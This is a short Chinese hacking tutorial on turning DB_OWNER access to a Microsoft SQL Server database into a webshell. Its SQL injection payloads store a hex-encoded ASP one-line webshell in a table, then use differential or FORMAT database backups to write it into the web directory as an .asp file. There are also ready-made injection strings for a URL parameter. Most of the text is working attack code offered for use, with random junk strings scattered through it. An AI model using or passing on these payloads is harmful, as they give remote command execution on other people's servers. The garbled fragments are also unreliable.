DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

; i; k$ l/ a% P) i, r( B* |" E9 `# h减少备份文件大小，得到可执行的webshell成功率提高不少
! j$ m3 h$ [" s" R一利用差异备份
: b& y) s; c( p2 b# y2 w加一个参数WITH DIFFERENTIAL
2 a' v/ O. C) ?
+ b8 f. p0 v9 v, N* K2 s4 b! W1
; D7 k4 P3 y* o, a+ u5 l5 }2
3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

! W& T- A% V* O$ m& n二利用完全FORMAT
加一个参数WITH FROMAT
* j5 N( e! v" n0 J" w- X7 J9 i有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
0 ~* t+ I9 }2 w) b) l+ O
$ T% q. M5 O# J, ?5 z% m1
2
3
" t1 E" l7 s+ _# w& d2 H4
. @/ q; O. K0 K declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
% n( U9 W, `, [# b  ocreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
+ l6 K/ g" x& b$ J" I& sdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
4 o- u% T0 @! G
总的来说就是那么简单几句,下面以备份数据库model为例子
( x1 W" ?7 C( m* b$ y1

, P& ~) |- A( d8 z- r, @% L1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
7 j* w6 K8 G! ?+ ?) I# l
2

1
! J% _- R! s# r, d8 {# R5 N) ?( C id=1;backup database model to disk='你的路径‘ with differential,format;--